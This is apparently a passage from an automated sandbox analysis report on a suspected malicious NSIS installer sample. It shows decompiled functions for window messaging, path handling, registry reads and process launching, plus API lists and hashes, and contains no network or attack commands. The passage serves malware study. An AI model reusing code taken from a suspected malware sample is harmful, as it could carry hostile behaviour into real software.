                                                                                    					_t59 = E00402BCE();
                                                                                    					_t32 = E00402BCE();
                                                                                    					asm("sbb ecx, ecx");
                                                                                    					asm("sbb eax, eax");
                                                                                    					_t35 =  ~( *_t31) & _t59;
                                                                                    					__eflags = _t35;
                                                                                    					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                    					goto L10;
                                                                                    				} else {
                                                                                    					_t61 = E00402BAC();
                                                                                    					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                    					_t41 = E00402BAC(2);
                                                                                    					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                    					_t56 =  *(_t64 - 0x14) >> 2;
                                                                                    					if(__eflags == 0) {
                                                                                    						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                                                    						L10:
                                                                                    						 *(_t64 - 0xc) = _t36;
                                                                                    					} else {
                                                                                    						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                                                    						asm("sbb eax, eax");
                                                                                    						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                    					}
                                                                                    				}
                                                                                    				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                                    				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                                    					_push( *(_t64 - 0xc));
                                                                                    					E00406055();
                                                                                    				}
                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
                                                                                    				return 0;
                                                                                    			}
















                                                                                    APIs
                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                                    • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                                    • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                                    • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                    				char _v36;
                                                                                    				char _v68;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t21;
                                                                                    				signed int _t22;
                                                                                    				void* _t29;
                                                                                    				void* _t31;
                                                                                    				void* _t32;
                                                                                    				void* _t41;
                                                                                    				signed int _t43;
                                                                                    				signed int _t47;
                                                                                    				signed int _t50;
                                                                                    				signed int _t51;
                                                                                    				signed int _t53;
                                                                                    
                                                                                    				_t21 = _a16;
                                                                                    				_t51 = _a12;
                                                                                    				_t41 = 0xffffffdc;
                                                                                    				if(_t21 == 0) {
                                                                                    					_push(0x14);
                                                                                    					_pop(0);
                                                                                    					_t22 = _t51;
                                                                                    					if(_t51 < 0x100000) {
                                                                                    						_push(0xa);
                                                                                    						_pop(0);
                                                                                    						_t41 = 0xffffffdd;
                                                                                    					}
                                                                                    					if(_t51 < 0x400) {
                                                                                    						_t41 = 0xffffffde;
                                                                                    					}
                                                                                    					if(_t51 < 0xffff3333) {
                                                                                    						_t50 = 0x14;
                                                                                    						asm("cdq");
                                                                                    						_t22 = 1 / _t50 + _t51;
                                                                                    					}
                                                                                    					_t23 = _t22 & 0x00ffffff;
                                                                                    					_t53 = _t22 >> 0;
                                                                                    					_t43 = 0xa;
                                                                                    					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                    				} else {
                                                                                    					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                    					_t47 = 0;
                                                                                    				}
                                                                                    				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                    				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
                                                                                    				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
                                                                                    				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                    				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
                                                                                    			}




















                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                                    • wsprintfA.USER32 ref: 00404A6A
                                                                                    • SetDlgItemTextA.USER32 ref: 00404A7D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s
                                                                                    • API String ID: 3540041739-3551169577
                                                                                    • Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                                    • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                                    • Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                                    • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405A8F(CHAR* _a4) {
                                                                                    				CHAR* _t7;
                                                                                    
                                                                                    				_t7 = _a4;
                                                                                    				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                    					lstrcatA(_t7, 0x40a014);
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}





                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3081826266
                                                                                    • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                    • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                                    • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                    • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00402E3D(intOrPtr _a4) {
                                                                                    				long _t2;
                                                                                    				struct HWND__* _t3;
                                                                                    				struct HWND__* _t6;
                                                                                    
                                                                                    				if(_a4 == 0) {
                                                                                    					if( *0x429448 == 0) {
                                                                                    						_t2 = GetTickCount();
                                                                                    						if(_t2 >  *0x42f430) {
                                                                                    							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
                                                                                    							 *0x429448 = _t3;
                                                                                    							return ShowWindow(_t3, 5);
                                                                                    						}
                                                                                    						return _t2;
                                                                                    					} else {
                                                                                    						return E0040653C(0);
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t6 =  *0x429448;
                                                                                    					if(_t6 != 0) {
                                                                                    						_t6 = DestroyWindow(_t6);
                                                                                    					}
                                                                                    					 *0x429448 = 0;
                                                                                    					return _t6;
                                                                                    				}
                                                                                    			}







                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                                                    • GetTickCount.KERNEL32 ref: 00402E6E
                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                                    • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                                    • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                                    • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 53%
                                                                                    			E00405B7D(void* __eflags, intOrPtr _a4) {
                                                                                    				int _t11;
                                                                                    				signed char* _t12;
                                                                                    				intOrPtr _t18;
                                                                                    				intOrPtr* _t21;
                                                                                    				void* _t22;
                                                                                    
                                                                                    				E004060F7(0x42bc98, _a4);
                                                                                    				_t21 = E00405B28(0x42bc98);
                                                                                    				if(_t21 != 0) {
                                                                                    					E004063D2(_t21);
                                                                                    					if(( *0x42f43c & 0x00000080) == 0) {
                                                                                    						L5:
                                                                                    						_t22 = _t21 - 0x42bc98;
                                                                                    						while(1) {
                                                                                    							_t11 = lstrlenA(0x42bc98);
                                                                                    							_push(0x42bc98);
                                                                                    							if(_t11 <= _t22) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t12 = E0040646B();
                                                                                    							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                    								E00405AD6(0x42bc98);
                                                                                    								continue;
                                                                                    							} else {
                                                                                    								goto L1;
                                                                                    							}
                                                                                    						}
                                                                                    						E00405A8F();
                                                                                    						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                                                    					}
                                                                                    					_t18 =  *_t21;
                                                                                    					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                    						goto L1;
                                                                                    					} else {
                                                                                    						goto L5;
                                                                                    					}
                                                                                    				}
                                                                                    				L1:
                                                                                    				return 0;
                                                                                    			}









                                                                                    APIs
                                                                                      • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,arability Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                                    • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                                    • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 3248276644-3081826266
                                                                                    • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                                    • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                                    • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                                    • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 89%
                                                                                    			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                    				int _t15;
                                                                                    				long _t16;
                                                                                    
                                                                                    				_t15 = _a8;
                                                                                    				if(_t15 != 0x102) {
                                                                                    					if(_t15 != 0x200) {
                                                                                    						_t16 = _a16;
                                                                                    						L7:
                                                                                    						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
                                                                                    							_push(_t16);
                                                                                    							_push(6);
                                                                                    							 *0x42a87c = _t16;
                                                                                    							E00404B4E();
                                                                                    						}
                                                                                    						L11:
                                                                                    						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
                                                                                    					}
                                                                                    					if(IsWindowVisible(_a4) == 0) {
                                                                                    						L10:
                                                                                    						_t16 = _a16;
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					_t16 = E00404ACE(_a4, 1);
                                                                                    					_t15 = 0x419;
                                                                                    					goto L7;
                                                                                    				}
                                                                                    				if(_a12 != 0x20) {
                                                                                    					goto L10;
                                                                                    				}
                                                                                    				E004041C7(0x413);
                                                                                    				return 0;
                                                                                    			}






                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 004051C1
                                                                                    • CallWindowProcA.USER32 ref: 00405212
                                                                                      • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                                    • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                                    • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                                    • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 90%
                                                                                    			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                                                    				int _v8;
                                                                                    				long _t21;
                                                                                    				long _t24;
                                                                                    				char* _t30;
                                                                                    
                                                                                    				asm("sbb eax, eax");
                                                                                    				_v8 = 0x400;
                                                                                    				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                    				_t30 = _a16;
                                                                                    				if(_t21 != 0) {
                                                                                    					L4:
                                                                                    					 *_t30 =  *_t30 & 0x00000000;
                                                                                    				} else {
                                                                                    					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                    					_t21 = RegCloseKey(_a20);
                                                                                    					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                                                    					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                    						goto L4;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t21;
                                                                                    			}








                                                                                    APIs
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,uvlcopdlxoed,0042A070,?,?,?,00000002,uvlcopdlxoed,?,00406293,80000002), ref: 00406024
                                                                                    • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,uvlcopdlxoed,uvlcopdlxoed,uvlcopdlxoed,?,0042A070), ref: 0040602F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: uvlcopdlxoed
                                                                                    • API String ID: 3356406503-3939465813
                                                                                    • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                    • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                                    • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                    • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405796(CHAR* _a4) {
                                                                                    				struct _PROCESS_INFORMATION _v20;
                                                                                    				int _t7;
                                                                                    
                                                                                    				0x42c098->cb = 0x44;
                                                                                    				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20);
                                                                                    				if(_t7 != 0) {
                                                                                    					CloseHandle(_v20.hThread);
                                                                                    					return _v20.hProcess;
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}






                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                                    • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                                    Strings
                                                                                    • Error launching installer, xrefs: 004057A9
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID: Error launching installer
                                                                                    • API String ID: 3712363035-66219284
                                                                                    • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                                    • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                                    • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                                    • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00403875() {
                                                                                    				void* _t2;
                                                                                    				void* _t3;
                                                                                    				void* _t6;
                                                                                    				void* _t8;
                                                                                    
                                                                                    				_t8 =  *0x429854;
                                                                                    				_t3 = E0040385A(_t2, 0);
                                                                                    				if(_t8 != 0) {
                                                                                    					do {
                                                                                    						_t6 = _t8;
                                                                                    						_t8 =  *_t8;
                                                                                    						FreeLibrary( *(_t6 + 8));
                                                                                    						_t3 = GlobalFree(_t6);
                                                                                    					} while (_t8 != 0);
                                                                                    				}
                                                                                    				 *0x429854 =  *0x429854 & 0x00000000;
                                                                                    				return _t3;
                                                                                    			}








                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,73BCFA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                                    • GlobalFree.KERNEL32 ref: 00403896
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                                    Similarity
                                                                                    • API ID: Free$GlobalLibrary
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 1100898210-3081826266
                                                                                    • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                    • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                                    • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                    • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405AD6(char* _a4) {
                                                                                    				char* _t3;
                                                                                    				char* _t5;
                                                                                    
                                                                                    				_t5 = _a4;
                                                                                    				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                    				while( *_t3 != 0x5c) {
                                                                                    					_t3 = CharPrevA(_t5, _t3);
                                                                                    					if(_t3 > _t5) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					break;
                                                                                    				}
                                                                                    				 *_t3 =  *_t3 & 0x00000000;
                                                                                    				return  &(_t3[1]);
                                                                                    			}






                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405ADC
                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405AEA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrlen
                                                                                    • String ID: C:\Users\user\Desktop
                                                                                    • API String ID: 2709904686-224404859
                                                                                    • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                    • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                                    • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                    • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                    				int _v8;
                                                                                    				int _t12;
                                                                                    				int _t14;
                                                                                    				int _t15;
                                                                                    				CHAR* _t17;
                                                                                    				CHAR* _t27;
                                                                                    
                                                                                    				_t12 = lstrlenA(_a8);
                                                                                    				_t27 = _a4;
                                                                                    				_v8 = _t12;
                                                                                    				while(lstrlenA(_t27) >= _v8) {
                                                                                    					_t14 = _v8;
                                                                                    					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                    					_t15 = lstrcmpiA(_t27, _a8);
                                                                                    					_t27[_v8] =  *(_t14 + _t27);
                                                                                    					if(_t15 == 0) {
                                                                                    						_t17 = _t27;
                                                                                    					} else {
                                                                                    						_t27 = CharNextA(_t27);
                                                                                    						continue;
                                                                                    					}
                                                                                    					L5:
                                                                                    					return _t17;
                                                                                    				}
                                                                                    				_t17 = 0;
                                                                                    				goto L5;
                                                                                    			}










                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
